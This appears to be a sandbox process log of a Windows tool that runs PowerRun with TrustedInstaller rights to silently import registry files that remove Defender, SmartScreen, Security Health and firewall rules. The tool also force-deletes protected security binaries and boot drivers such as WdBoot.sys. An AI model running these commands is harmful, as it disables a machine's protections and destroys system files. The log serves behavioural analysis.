"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\No more Delay and Timeouts.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of SecHealthUI.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Anti-Phishing Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of SecHealthUI.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Defender Antivirus.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Anti-Phishing Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Defender Antivirus.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of SecHealthUI.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Security Action Center.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of SecHealthUI.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Defender Antivirus.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Security Action Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Defender Tasks.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Defender Antivirus.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Security Action Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Defender Tasks.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Security and Maintenance.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Security Action Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Defender Tasks.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Security and Maintenance.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Services.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Defender Tasks.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Security and Maintenance.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Shell Association.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Security and Maintenance.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Shell Association.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Startup Entries.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Shell Association.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Startup Entries.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows Defender Firewall Rules.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows Defender Firewall Rules.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Startup Entries.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Shell Association.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows WebThreat.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows Defender Firewall Rules.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Startup Entries.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows WebThreat.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remover of Defender Context Menu.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows Defender Firewall Rules.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remover of Defender Context Menu.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows WebThreat.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Security Health.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows WebThreat.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remover of Defender Context Menu.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Security Health.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Windows Settings Page Visibility.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remover of Defender Context Menu.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Windows Settings Page Visibility.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Security Health.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\CompatTelRunner.exe"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Security Health.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Windows Settings Page Visibility.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\CompatTelRunner.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\DeviceCensus.exe"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Windows Settings Page Visibility.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\CompatTelRunner.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\DeviceCensus.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\DeviceCensus.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\CompatTelRunner.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\DeviceCensus.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreenps.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\smartscreen.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\DWWIN.EXE"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\DWWIN.EXE"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\GameBarPresenceWriter.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\DWWIN.EXE"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance.png"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\DWWIN.EXE"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance_Error.png"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance_Error.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthAgent.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityAndMaintenance.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance_Error.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthAgent.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthCore.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityAndMaintenance_Error.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthAgent.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthCore.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthHost.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthCore.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthAgent.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthHost.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthProxyStub.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthCore.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthProxyStub.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthHost.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthService.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthProxyStub.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthHost.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthService.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSsoUdk.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthProxyStub.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthService.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSsoUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSystray.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthService.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSsoUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSystray.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthUdk.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthSsoUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSystray.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\drivers\SgrmAgent.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthSystray.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\drivers\SgrmAgent.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdBoot.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\drivers\SgrmAgent.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdBoot.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
